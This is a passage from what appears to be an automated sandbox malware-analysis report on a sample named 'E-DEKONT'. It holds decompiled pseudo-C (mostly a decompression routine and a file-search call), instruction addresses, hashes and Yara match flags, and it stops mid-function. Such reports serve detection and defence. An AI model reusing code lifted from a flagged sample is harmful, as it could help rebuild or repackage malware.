                                                                            										_t274 = _t256 + 1;
                                                                            										if(_t274 > 0x5a0) {
                                                                            											goto L64;
                                                                            										}
                                                                            									} else {
                                                                            										_t275 = _v32;
                                                                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                            										if(_t222 >= _t296) {
                                                                            											goto L40;
                                                                            										}
                                                                            										while(1) {
                                                                            											_t222 = _t222 + 1;
                                                                            											if(_t222 >= _t296) {
                                                                            												goto L40;
                                                                            											}
                                                                            											_t275 = _t275 + 4;
                                                                            											_t264 = _t263 + _t263;
                                                                            											_t175 =  *_t275;
                                                                            											if(_t264 <= _t175) {
                                                                            												goto L40;
                                                                            											}
                                                                            											_t263 = _t264 - _t175;
                                                                            										}
                                                                            										goto L40;
                                                                            									}
                                                                            									_t168 = _a32 + _t256 * 4;
                                                                            									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                            									 *_a36 = _t274;
                                                                            									_t259 = _v16;
                                                                            									 *_t297 = _t168;
                                                                            									if(_t259 == 0) {
                                                                            										 *_a24 = _t168;
                                                                            									} else {
                                                                            										_t276 = _v12;
                                                                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                            										_t98 =  &_a28; // 0x432170
                                                                            										_a5 =  *_t98;
                                                                            										_a4 = _t222;
                                                                            										_t262 = _t276 >> _t186;
                                                                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                            										 *(_t298 + _t262 * 4) = _a4;
                                                                            									}
                                                                            									_t224 = _v24;
                                                                            									_t186 = _t224;
                                                                            									_t107 =  &_a28; // 0x432170
                                                                            									_t225 = _t224 +  *_t107;
                                                                            									_v24 = _t225;
                                                                            								} while (_v8 > _t225);
                                                                            								L45:
                                                                            								_t111 =  &_v36; // 0x432170
                                                                            								_t284 =  *_t111;
                                                                            								_a5 = _v8 - _t186;
                                                                            								if(_t284 < 0x432170 + _a8 * 4) {
                                                                            									_t205 =  *_t284;
                                                                            									if(_t205 >= _a12) {
                                                                            										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                            										_v36 =  &(_v36[1]);
                                                                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                            									} else {
                                                                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                            										_t208 =  *_t284;
                                                                            										_v36 =  &(_t284[1]);
                                                                            									}
                                                                            									_a6 = _t208;
                                                                            								} else {
                                                                            									_a4 = 0xc0;
                                                                            								}
                                                                            								_t286 = 1 << _v8 - _t186;
                                                                            								_t244 = _v12 >> _t186;
                                                                            								while(_t244 < _v40) {
                                                                            									 *(_t168 + _t244 * 4) = _a4;
                                                                            									_t244 = _t244 + _t286;
                                                                            								}
                                                                            								_t287 = _v12;
                                                                            								_t246 = 1 << _v44;
                                                                            								while((_t287 & _t246) != 0) {
                                                                            									_t287 = _t287 ^ _t246;
                                                                            									_t246 = _t246 >> 1;
                                                                            								}
                                                                            								_t288 = _t287 ^ _t246;
                                                                            								_v20 = 1;
                                                                            								_v12 = _t288;
                                                                            								_t251 = _v16;
                                                                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                            									L60:
                                                                            									if(_v48 != 0) {
                                                                            										_t282 = _v48;
                                                                            										_t65 =  &_a28; // 0x432170
                                                                            										_t283 = _t282 - 1;
                                                                            										_t200 =  *_t65 + _t186;
                                                                            										_v48 = _t283;
                                                                            										_v24 = _t200;
                                                                            										if(_v8 <= _t200) {
                                                                            											goto L45;
                                                                            										}
                                                                            										goto L31;
                                                                            									}
                                                                            									break;
                                                                            								} else {
                                                                            									goto L58;
                                                                            								}
                                                                            								do {
                                                                            									L58:
                                                                            									_t186 = _t186 - _a28;
                                                                            									_t251 = _t251 - 1;
                                                                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                            								_v16 = _t251;
                                                                            								goto L60;
                                                                            							}
                                                                            							L61:
                                                                            							_v8 = _v8 + 1;
                                                                            							_v32 = _v32 + 4;
                                                                            							_v44 = _v44 + 1;
                                                                            						} while (_v8 <= _v28);
                                                                            						goto L62;
                                                                            					}
                                                                            					_t277 = 0;
                                                                            					do {
                                                                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                            						_t277 = _t277 + 4;
                                                                            						_t235 = _t235 - 1;
                                                                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                            					} while (_t235 != 0);
                                                                            					goto L21;
                                                                            				}
                                                                            				 *_a24 =  *_a24 & 0x00000000;
                                                                            				 *_a28 =  *_a28 & 0x00000000;
                                                                            				return 0;
                                                                            			}

                                                                            0x00407370
                                                                            0x00407385
                                                                            0x00407385
                                                                            0x00407388
                                                                            0x0040738a
                                                                            0x0040738a
                                                                            0x0040738c
                                                                            0x00407391
                                                                            0x00407393
                                                                            0x0040739a
                                                                            0x0040739c
                                                                            0x004073a4
                                                                            0x004073a4
                                                                            0x004073a6
                                                                            0x004073a7
                                                                            0x004073b6
                                                                            0x004073ba
                                                                            0x004073be
                                                                            0x004073c1
                                                                            0x004073c4
                                                                            0x004073c9
                                                                            0x004073cc
                                                                            0x004073d2
                                                                            0x004073d9
                                                                            0x004073df
                                                                            0x004075d8
                                                                            0x004075d8
                                                                            0x004075dd
                                                                            0x004075ec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075dd
                                                                            0x004073ec
                                                                            0x004073ef
                                                                            0x004073f2
                                                                            0x004073f5
                                                                            0x004073f9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407404
                                                                            0x00407404
                                                                            0x00407407
                                                                            0x00407408
                                                                            0x0040740a
                                                                            0x00407410
                                                                            0x00407413
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407419
                                                                            0x0040741a
                                                                            0x0040741d
                                                                            0x00407420
                                                                            0x00407423
                                                                            0x00407426
                                                                            0x00407429
                                                                            0x0040742b
                                                                            0x0040742b
                                                                            0x0040742b
                                                                            0x00407433
                                                                            0x00407437
                                                                            0x0040743c
                                                                            0x00407461
                                                                            0x00407467
                                                                            0x00407469
                                                                            0x0040746b
                                                                            0x0040746e
                                                                            0x00407477
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040743e
                                                                            0x0040743e
                                                                            0x00407447
                                                                            0x0040744b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040745c
                                                                            0x0040745c
                                                                            0x0040745f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040744f
                                                                            0x00407452
                                                                            0x00407454
                                                                            0x00407458
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040745a
                                                                            0x0040745a
                                                                            0x00000000
                                                                            0x0040745c
                                                                            0x00407480
                                                                            0x00407486
                                                                            0x00407490
                                                                            0x00407492
                                                                            0x00407497
                                                                            0x00407499
                                                                            0x004074cf
                                                                            0x0040749b
                                                                            0x0040749b
                                                                            0x0040749e
                                                                            0x004074a1
                                                                            0x004074a8
                                                                            0x004074ab
                                                                            0x004074ae
                                                                            0x004074b5
                                                                            0x004074c0
                                                                            0x004074c7
                                                                            0x004074c7
                                                                            0x004074d1
                                                                            0x004074d4
                                                                            0x004074d6
                                                                            0x004074d6
                                                                            0x004074dc
                                                                            0x004074dc
                                                                            0x004074e5
                                                                            0x004074e8
                                                                            0x004074e8
                                                                            0x004074ed
                                                                            0x004074fc
                                                                            0x00407504
                                                                            0x00407509
                                                                            0x0040752d
                                                                            0x00407535
                                                                            0x00407539
                                                                            0x0040753f
                                                                            0x0040750b
                                                                            0x00407519
                                                                            0x0040751c
                                                                            0x00407522
                                                                            0x00407522
                                                                            0x00407543
                                                                            0x004074fe
                                                                            0x004074fe
                                                                            0x004074fe
                                                                            0x00407554
                                                                            0x00407558
                                                                            0x00407564
                                                                            0x0040755f
                                                                            0x00407562
                                                                            0x00407562
                                                                            0x0040756c
                                                                            0x00407571
                                                                            0x00407579
                                                                            0x00407575
                                                                            0x00407577
                                                                            0x00407577
                                                                            0x0040757f
                                                                            0x00407581
                                                                            0x00407588
                                                                            0x00407592
                                                                            0x0040759c
                                                                            0x004075b8
                                                                            0x004075bc
                                                                            0x00407401
                                                                            0x00407404
                                                                            0x00407407
                                                                            0x00407408
                                                                            0x0040740a
                                                                            0x00407410
                                                                            0x00407413
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407413
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040759e
                                                                            0x0040759e
                                                                            0x0040759e
                                                                            0x004075a3
                                                                            0x004075ac
                                                                            0x004075b5
                                                                            0x00000000
                                                                            0x004075b5
                                                                            0x004075c2
                                                                            0x004075c2
                                                                            0x004075c5
                                                                            0x004075cc
                                                                            0x004075cf
                                                                            0x00000000
                                                                            0x004073f2
                                                                            0x00407372
                                                                            0x00407374
                                                                            0x00407374
                                                                            0x00407378
                                                                            0x0040737b
                                                                            0x0040737c
                                                                            0x0040737c
                                                                            0x00000000
                                                                            0x00407374
                                                                            0x004072e8
                                                                            0x004072ee
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p!C$p!C
                                                                            • API String ID: 0-3125587631
                                                                            • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                            • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                                            • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                            • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: qa5
                                                                            • API String ID: 0-2046460547
                                                                            • Opcode ID: 9a54a1260ae600a96ec5e2b28d42ec1dca3035204e32fdc249480b3fab4b8899
                                                                            • Instruction ID: 5c282e4e45e42d61f1b9fcec00cce039fefc397b411f034addcc0cd9cf3e9446
                                                                            • Opcode Fuzzy Hash: 9a54a1260ae600a96ec5e2b28d42ec1dca3035204e32fdc249480b3fab4b8899
                                                                            • Instruction Fuzzy Hash: A7D15B755053429BD72A6E35C95A3E63BA6EF133A4FA844AECCC54F916D33600C6CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 39%
                                                                            			E00402862(short __ebx, short* __esi) {
                                                                            				void* _t21;
                                                                            
                                                                            				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
                                                                            					E004061C9( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                            					_push(_t21 - 0x2a8);
                                                                            					_push(__esi);
                                                                            					E00406282();
                                                                            				} else {
                                                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                            					 *__esi = __ebx;
                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                            				return 0;
                                                                            			}





                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
                                                                            • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                            • Opcode Fuzzy Hash: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
                                                                            • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-1850852036
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-1850852036
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E00406ADD(signed int __ebx, signed int* __esi) {
                                                                            				signed int _t396;
                                                                            				signed int _t425;
                                                                            				signed int _t442;
                                                                            				signed int _t443;
                                                                            				signed int* _t446;
                                                                            				void* _t448;
                                                                            
                                                                            				L0:
                                                                            				while(1) {
                                                                            					L0:
                                                                            					_t446 = __esi;
                                                                            					_t425 = __ebx;
                                                                            					if( *(_t448 - 0x34) == 0) {
                                                                            						break;
                                                                            					}
                                                                            					L55:
                                                                            					__eax =  *(__ebp - 0x38);
                                                                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            					__ecx = __ebx;
                                                                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            					__ebx = __ebx + 8;
                                                                            					while(1) {
                                                                            						L56:
                                                                            						if(__ebx < 0xe) {
                                                                            							goto L0;
                                                                            						}
                                                                            						L57:
                                                                            						__eax =  *(__ebp - 0x40);
                                                                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                            						__ecx = __eax;
                                                                            						__esi[1] = __eax;
                                                                            						__ecx = __eax & 0x0000001f;
                                                                            						if(__cl > 0x1d) {
                                                                            							L9:
                                                                            							_t443 = _t442 | 0xffffffff;
                                                                            							 *_t446 = 0x11;
                                                                            							L10:
                                                                            							_t446[0x147] =  *(_t448 - 0x40);
                                                                            							_t446[0x146] = _t425;
                                                                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                            							L11:
                                                                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                            							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                            							E0040724C( *(_t448 + 8));
                                                                            							return _t443;
                                                                            						}
                                                                            						L58:
                                                                            						__eax = __eax & 0x000003e0;
                                                                            						if(__eax > 0x3a0) {
                                                                            							goto L9;
                                                                            						}
                                                                            						L59:
                                                                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                            						__ebx = __ebx - 0xe;
                                                                            						_t94 =  &(__esi[2]);
                                                                            						 *_t94 = __esi[2] & 0x00000000;
                                                                            						 *__esi = 0xc;
                                                                            						while(1) {
                                                                            							L60:
                                                                            							__esi[1] = __esi[1] >> 0xa;
                                                                            							__eax = (__esi[1] >> 0xa) + 4;
                                                                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                            								goto L68;
                                                                            							}
                                                                            							L61:
                                                                            							while(1) {
                                                                            								L64:
                                                                            								if(__ebx >= 3) {
                                                                            									break;
                                                                            								}
                                                                            								L62:
                                                                            								if( *(__ebp - 0x34) == 0) {
                                                                            									goto L183;
                                                                            								}
                                                                            								L63:
                                                                            								__eax =  *(__ebp - 0x38);
                                                                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            								__ecx = __ebx;
                                                                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            								__ebx = __ebx + 8;
                                                                            							}
                                                                            							L65:
                                                                            							__ecx = __esi[2];
                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                            							__ebx = __ebx - 3;
                                                                            							_t108 = __ecx + 0x4084cc; // 0x121110
                                                                            							__ecx =  *_t108;
                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                            							__ecx = __esi[1];
                                                                            							__esi[2] = __esi[2] + 1;
                                                                            							__eax = __esi[2];
                                                                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                            								goto L64;
                                                                            							}
                                                                            							L66:
                                                                            							while(1) {
                                                                            								L68:
                                                                            								if(__esi[2] >= 0x13) {
                                                                            									break;
                                                                            								}
                                                                            								L67:
                                                                            								_t119 = __esi[2] + 0x4084cc; // 0x4000300
                                                                            								__eax =  *_t119;
                                                                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                            								_t126 =  &(__esi[2]);
                                                                            								 *_t126 = __esi[2] + 1;
                                                                            							}
                                                                            							L69:
                                                                            							__ecx = __ebp - 8;
                                                                            							__edi =  &(__esi[0x143]);
                                                                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                            							__eax = 0;
                                                                            							 *(__ebp - 8) = 0;
                                                                            							__eax =  &(__esi[3]);
                                                                            							 *__edi = 7;
                                                                            							__eax = E004072B4( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                            							if(__eax != 0) {
                                                                            								L72:
                                                                            								 *__esi = 0x11;
                                                                            								while(1) {
                                                                            									L181:
                                                                            									_t396 =  *_t446;
                                                                            									if(_t396 > 0xf) {
                                                                            										break;
                                                                            									}
                                                                            									L1:
                                                                            									switch( *((intOrPtr*)(_t396 * 4 +  &M0040720C))) {
                                                                            										case 0:
                                                                            											L101:
                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                            											__eax = __esi[5];
                                                                            											__esi[2] = __esi[5];
                                                                            											 *__esi = 1;
                                                                            											goto L102;
                                                                            										case 1:
                                                                            											L102:
                                                                            											__eax = __esi[3];
                                                                            											while(1) {
                                                                            												L105:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L103:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L104:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L106:
                                                                            											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                            											__ecx = __esi[2];
                                                                            											__eax = __esi[2] + __eax * 4;
                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                            											__eflags = __ecx;
                                                                            											if(__ecx != 0) {
                                                                            												L108:
                                                                            												__eflags = __cl & 0x00000010;
                                                                            												if((__cl & 0x00000010) == 0) {
                                                                            													L110:
                                                                            													__eflags = __cl & 0x00000040;
                                                                            													if((__cl & 0x00000040) == 0) {
                                                                            														goto L125;
                                                                            													}
                                                                            													L111:
                                                                            													__eflags = __cl & 0x00000020;
                                                                            													if((__cl & 0x00000020) == 0) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L112:
                                                                            													 *__esi = 7;
                                                                            													goto L181;
                                                                            												}
                                                                            												L109:
                                                                            												__esi[2] = __ecx;
                                                                            												__esi[1] = __eax;
                                                                            												 *__esi = 2;
                                                                            												goto L181;
                                                                            											}
                                                                            											L107:
                                                                            											__esi[2] = __eax;
                                                                            											 *__esi = 6;
                                                                            											goto L181;
                                                                            										case 2:
                                                                            											L113:
                                                                            											__eax = __esi[2];
                                                                            											while(1) {
                                                                            												L116:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L114:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L115:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L117:
                                                                            											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            											__esi[1] = __esi[1] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            											__ecx = __eax;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - __eax;
                                                                            											__eflags = __ebx;
                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                            											__eax = __esi[6];
                                                                            											__esi[2] = __esi[6];
                                                                            											 *__esi = 3;
                                                                            											goto L118;
                                                                            										case 3:
                                                                            											L118:
                                                                            											__eax = __esi[3];
                                                                            											while(1) {
                                                                            												L121:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L119:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L120:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L122:
                                                                            											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                            											__ecx = __esi[2];
                                                                            											__eax = __esi[2] + __eax * 4;
                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                            											__eflags = __cl & 0x00000010;
                                                                            											if((__cl & 0x00000010) == 0) {
                                                                            												L124:
                                                                            												__eflags = __cl & 0x00000040;
                                                                            												if((__cl & 0x00000040) != 0) {
                                                                            													goto L9;
                                                                            												}
                                                                            												L125:
                                                                            												__esi[3] = __ecx;
                                                                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                            												__esi[2] = __eax;
                                                                            												goto L181;
                                                                            											}
                                                                            											L123:
                                                                            											__esi[2] = __ecx;
                                                                            											__esi[3] = __eax;
                                                                            											 *__esi = 4;
                                                                            											goto L181;
                                                                            										case 4:
                                                                            											L126:
                                                                            											__eax = __esi[2];
                                                                            											while(1) {
                                                                            												L129:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L127:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L128:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
